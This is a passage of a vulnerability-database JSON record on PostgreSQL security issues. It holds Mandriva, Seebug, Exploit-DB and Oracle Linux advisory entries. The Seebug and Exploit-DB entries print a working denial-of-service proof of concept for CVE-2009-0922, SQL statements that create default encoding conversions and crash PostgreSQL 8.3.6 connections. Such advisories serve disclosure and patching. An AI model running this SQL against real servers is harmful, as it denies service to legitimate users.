mes5/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2a9f7ddd1c6b1df8fbaed9f75855d215 mes5/x86_64/lib64pq8.3_5-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 5a99bffb08073b986c113f4e01290acb mes5/x86_64/postgresql8.3-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 34a240a407e23e22fa4fafcacd42aaa4 mes5/x86_64/postgresql8.3-contrib-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 328ffce47393a37b8513ca4db35cfa0e mes5/x86_64/postgresql8.3-devel-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2813c49a1081e9ba21641ff0221c0282 mes5/x86_64/postgresql8.3-docs-8.3.9-0.1mdvmes5.x86_64.rpm\r\n ae7edc79dfcbe71b63d3cc63002b999e mes5/x86_64/postgresql8.3-pl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n b329ee3b0bf6f225d63967194a9ad1f7 mes5/x86_64/postgresql8.3-plperl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 3357aeaff40947216df472606af69f92 mes5/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2d1643ae72848a853075a348c3e710b1 mes5/x86_64/postgresql8.3-plpython-8.3.9-0.1mdvmes5.x86_64.rpm\r\n e190019db4c20a65fbcb6ec71b87fb73 mes5/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 95397048806b12338bf90c216f93f8c6 mes5/x86_64/postgresql8.3-server-8.3.9-0.1mdvmes5.x86_64.rpm \r\n a71b64c6243bc5302fd20a09b6f209a7 mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFLJ6UdmqjQ0CJFipgRAhI0AKDu7P9IZkttVPb8P6UTShYJa6HLxgCcC6JU\r\nwNWFQRVDjFT4KODLej6slSQ=\r\n=9pvm\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-12-15T00:00:00", "published": "2009-12-15T00:00:00", "id": "SECURITYVULNS:DOC:22944", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22944", "title": "[ MDVSA-2009:333 ] postgresql", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:56:14", "description": "BUGTRAQ ID: 34090\r\nCVE(CAN) ID: CVE-2009-0922\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u9ad8\u7ea7\u5bf9\u8c61\uff0d\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u5904\u7406\u8f6c\u6362\u7f16\u7801\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u901a\u8fc7\u8ba4\u8bc1\u7684\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u7279\u5236\u7684SQL\u67e5\u8be2\u8bf7\u6c42\u5728\u4e00\u6bb5\u65f6\u95f4\u671f\u95f4\u6740\u6b7b\u5230PostgreSQL\u670d\u52a1\u5668\u7684\u8fde\u63a5\uff0c\u4e2d\u65ad\u5176\u4ed6\u7528\u6237\u548c\u5ba2\u6237\u7aef\u7684\u4e8b\u52a1\u5904\u7406\u3002\n\nPostgreSQL 8.3.6\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPostgreSQL\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.postgresql.org target=_blank rel=external nofollow>http://www.postgresql.org</a>", "published": "2009-03-19T00:00:00", "title": "PostgreSQL\u8f6c\u6362\u7f16\u7801\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0922"], "modified": "2009-03-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4928", "id": "SSV:4928", "sourceData": "\n =cut=\r\npostgres(at)sunset:~$ createdb test -E KOI8\r\npostgres(at)sunset:~$ psql test\r\nWelcome to psql 8.3.6, the PostgreSQL interactive terminal.\r\n\r\nType: \\\\copyright for distribution terms\r\n \\\\h for help with SQL commands\r\n \\\\? for help with psql commands\r\n \\\\g or terminate with semicolon to execute query\r\n \\\\q to quit\r\n\r\ntest=# SHOW server_version;\r\nserver_version \r\n----------------\r\n8.3.6\r\n(1 row)\r\n\r\ntest=# CREATE DEFAULT CONVERSION test1 FOR \\'LATIN1\\' TO \\'KOI8\\' FROM\r\nascii_to_mic;\r\nCREATE CONVERSION\r\ntest=# CREATE DEFAULT CONVERSION test2 FOR \\'KOI8\\' TO \\'LATIN1\\' FROM\r\nmic_to_ascii;\r\nCREATE CONVERSION\r\ntest=# set client_encoding to \\'LATIN1\\';\r\nserver closed the connection unexpectedly\r\n This probably means the server terminated abnormally\r\n before or while processing the request.\r\n\u0421\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u0431\u044b\u043b\u043e \u043f\u043e\u0442\u0435\u0440\u044f\u043d\u043e.\r\n\u041f\u043e\u043f\u044b\u0442\u043a\u0430 \u043f\u0435\u0440\u0435\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c: \u0411\u0435\u0437\u0443\u0441\u043f\u0435\u0448\u043d\u043e.\r\n!&gt; \\\\q\r\n=end cut=\r\n\r\n\n ", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-4928"}], "exploitdb": [{"lastseen": "2016-02-03T17:56:29", "description": "PostgreSQL 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability. CVE-2009-0922. Dos exploit for linux platform", "published": "2009-03-11T00:00:00", "type": "exploitdb", "title": "PostgreSQL <= 8.3.6 - Conversion Encoding Remote Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0922"], "modified": "2009-03-11T00:00:00", "id": "EDB-ID:32849", "href": "https://www.exploit-db.com/exploits/32849/", "sourceData": "source: http://www.securityfocus.com/bid/34090/info\r\n\r\nPostgreSQL is prone to a remote denial-of-service vulnerability.\r\n\r\nExploiting this issue may allow attackers to terminate connections to the PostgreSQL server, denying service to legitimate users.\r\n\r\ntest=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM\r\nascii_to_mic;\r\nCREATE CONVERSION\r\ntest=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM\r\nmic_to_ascii;\r\nCREATE CONVERSION\r\ntest=# set client_encoding to 'LATIN1'; ", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32849/"}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:35", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6600", "CVE-2007-6601"], "description": " [7.3.21-1]\n - Update to PostgreSQL 7.3.21 to fix CVE-2007-6600, CVE-2007-6601\n Resolves: #427134 ", "edition": 4, "modified": "2008-01-11T00:00:00", "published": "2008-01-11T00:00:00", "id": "ELSA-2008-0039", "href": "http://linux.oracle.com/errata/ELSA-2008-0039.html", "title": "Moderate: postgresql security update ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0922", "CVE-2009-3230"], "description": "[8.1.18-2.el5_4.1]\n- Remove unnecessary .o file that confuses TPS tests\nRelated: #525284\n[8.1.18-1.el5_4.1]\n- Update to PostgreSQL 8.1.18 to fix CVE-2009-0922, CVE-2009-3230,\n and assorted other bugs described at\n http://www.postgresql.org/docs/8.1/static/release.html\nResolves: #525284", "edition": 4, "modified": "2009-10-07T00:00:00", "published": "2009-10-07T00:00:00", "id": "ELSA-2009-1484", "href": "http://linux.oracle.com/errata/ELSA-2009-1484.html", "title": "postgresql security update", "type": "oraclelinux", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}